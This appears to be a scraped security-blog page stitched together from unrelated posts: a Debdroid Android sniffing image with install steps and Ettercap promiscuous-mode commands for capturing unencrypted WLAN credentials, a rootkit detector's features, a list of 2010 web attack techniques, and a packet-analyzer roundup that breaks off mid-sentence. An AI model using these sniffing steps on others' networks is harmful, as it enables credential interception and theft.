Debdroid: Run a Network Sniffing Debian System on Android!

Just recently, it was announced that the Android phone operating system has grown a lot in the last two years. This we know from a fact by looking at the numerous Android powered phones in the market now. With increase in usage, you will also find an increase in tools that help you with ‘breakage’ . Examples of those are – Android LOIC (we haven’t covered this yet!), Nmap 5.50 for Android and Droidmap. Now, we have – Debdroid.

Debroid helps you run a Debian system with a lot of utilities that help you sniff packets. In addition to various other tools and libraries, it contains tools such as:

- openssh
- libpcap
- libpcap-dev
- ettercap
- wireshark
- carwhisperer
- btscan
- NMAP
- ntbscan
These come pre-installed with the Debian image. To install, simply download the image from the links provided and follow these steps:

Unzip the .zip and .7z files and copy all the contents to /sdcard/debian/
Run your preferred terminal emulator and run bash with su.
Install debroid with – sh ./sdcard/debian/debian.sh
Boot into debian with the following command – debroid and voila!

You will be presented with a similar screen:



Now to the juice of this Debian. This is one of the reasons, we like this a lot – Run Ettercap in a promiscuous mode:

ifconfig eth0 promisc
cd /root/tools/
./etrun
That’s all! You can now sniff the WLAN traffic with un-encrypted credentials and use the capture file later with something like Wireshark. The author plans on adding GUIs for tools such as NMAP, etc. It does not require a lot of dependencies either. It just requires the following:

Root access
Busybox
Kernel that supports loopback devices and ext2 (Tested on various Cyanogen Mod nightly builds, HTC EVO to be precise)

Tuluka kernel inspector : Rootkit detector

Tuluka is very effective tool for professionals who need to find malicious programs in system


Tuluka is a new powerful AntiRootkit, which has the following features:

- Detects hidden processes, drivers and devices
- Detects IRP hooks
- Identifies the substitution of certain fields in DRIVER_OBJECT structure
- Checks driver signatures
- Detects and restores SSDT hooks
- Detects suspicious descriptors in GDT
- IDT hook detection
- SYSENTER hook detection
- Displays list of system threads and allows you to suspend them
- IAT and Inline hook detection
- Shows the actual values of the debug registers, even if reading these registers is controlled by someone
- Allows you to find the system module by the address within this module
- Allows you to display contents of kernel memory and save it to disk
- Allows you to dump kernel drivers and main modules of all processes
- Allows you to terminate any process
- Is able to dissasemble interrupt and IRP handlers, system services, start routines of system threads
- Allows to build the stack for selected device
- Much more..

Top 10 Web hacking techniques of 2010 revealed

FROM THE SECURITY WORLD: Quirky moments at Black Hat DC 2011

1.Padding Oracle Crypto Attack, the hack takes advantage of how Microsoft's Web framework ASP.NET protects AES encryption cookies.

2.Evercookie -- This enables a Java script to create cookies that hide in eight different places within a browser, making it difficult to scrub them. Evercookie enables the hacker to identify the machine even if traditional cookies have been removed. (Created by Samy Kamkar.)

3.Hacking Autocomplete -- If the feature in certain browsers that automatically completes forms on Web sites (autocomplete) is turned on, script on a malicious Web site can force the browser to fill in personal data by tapping various data stored on the victim's computer. (Created by Jeremiah Grossman.)

4.Attacking HTTPS with Cache Injection -- Injection of malicious Java script libraries into a browser cache enables attackers to compromise Web sites protected by SSL. This will work until the cache is cleared. Nearly half the top 1 million Web sites use external Java script libraries. (Crated by Elie Bursztein, Baptiste Gourdin and Dan Boneh.)

5.Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution -- Gets around cross site request forgery defenses and tricks victims into revealing their e-mail IDs. Using these, the attackers can reset the victim's passwords and gain access to their accounts. (Created by Lavakumar Kuppan.)

6.Universal XSS in IE8 -- Internet Explorer 8 has cross-site scripting protections that this exploit can circumvent and allow Web pages to be rendered improperly in a potentially malicious manner.

7.HTTP POST DoS -- HTTP POST headers are sent to servers to let them know how much data is being sent, then the data is sent very slowly, eating up the servers' resources. When many of these are sent simultaneously, the servers are overwhelmed. (Created by Wong Onn Chee and Tom Brennan.)

8.JavaSnoop -- A Java agent attached to the target machine communicates with the JavaSnoop tool to test applications on the machine for security weaknesses. This could be a security tool or a hacking tool, depending on the user's mindset. (Created by Arshan Dabirsiagh.)

9.CSS History Hack in Firefox without JavaScript for Intranet Port Scanning -- Cascading style sheets, used to define the presentation of HTML, can be used to grab browser histories as victims visit Web sites. The history information can be used to set the victim up for phishing attacks. (Created by Robert "RSnake" Hansen.)

10.Java Applet DNS Rebinding -- A pair of Java applets direct a browser to a pair of attacker controlled Web sites, forcing the browser to bypass its DNS cache and so make it susceptible to an NDS rebinding attack. (Created by Stefano Di Paola.)

5 Best Free Network Packet Analyzer tool!

Network Packet Analyzer, a network analyzer program that help network administrator captures and interactively browse the traffic packet that running on a computer network and analyze traffic information

1. WireShark : Wireshark packet sniffer is the most popular free network packet sniffer that works on both Unix, as well as Windows. Wireshark packet sniffer able to capture live real-time network packets. Apart from that, it is able to intelligently decipher packets based on their protocol. It can show the capture data on GUI. It is even able to detect and capture VOIP calls, and in some cases can even play back the media.
Apart from that, Wireshark network packet website also provides tons of resources, including videos, to learn how to use Wireshark, and analyze Wireshark data!


2. Microsoft Network Monitor: Microsoft Network Monitor is a free network packet analyzer and works on Windows PCs only. It provides expert network capability to see all the network traffic in real time on an intuitive GUI. Meanwhile, it can capture and view network information more than 300 public, and Microsoft proprietary network protocols including wireless network packets.
Besides that, Microsoft Network Monitor can be used by beginners just to analyze their home network traffic, or by network administrators to analyze complete organization network by sniffing network packets.
Download Microsoft Network Monitor here

3. Capsa Packet Sniffer: Capsa is a must-have network packet analyzer freeware for network administrators to monitor, troubleshoot and diagnose their network.The free network packet analyzer version comes with tons of features, and is good enough for home use, as well as use in small business.
Free Capsa Packet Sniffer software lets you monitor and capture 50 IP addresses network traffic data together and effective network analysis in real time by sniffing network packets, and analyze them.
Capsa Packet Sniffer Features:

Detailed Traffic Monitor of all computers
Bandwidth monitoring (to find which computers are watching online videos)
Network diagnosis to identify problems in network
Netwok activity logging (for recording IM, and web mail)
Network behavior monitoring
Download Capsa Packet Sniffer here.

4. InnoNWSniffer: The name InnoNWSniffer stands for Inno Network Sniffer. The application was developed to be a small IP scanner similar to Network Sniffer. It can scan Live Public IP and scan any computer on the LAN. More over it can give a detailed system Information.


5. SniffPass
SniffPass is a unique traffic packet sniffer, which it focuses on capturing passwords from network traffic. Whenever you active Sniffpass password sniffer, it will keeps on monitoring network traffic and as soon as it intercepts a password, it instantly shows that on screen. This is a great way to find forgotten passwords of websites.
Sniffpass password sniffer is quite easy in its use, and provides a nice GUI to monitor all captured passwords. Sniffpass password sniffer supports most of the networks protocols, like: POP3, IMAP4, SMTP, FTP, and

remote pc pakai client remote desktop android

tungguu....

UNTUK TAHUN 2011 CONFRENCE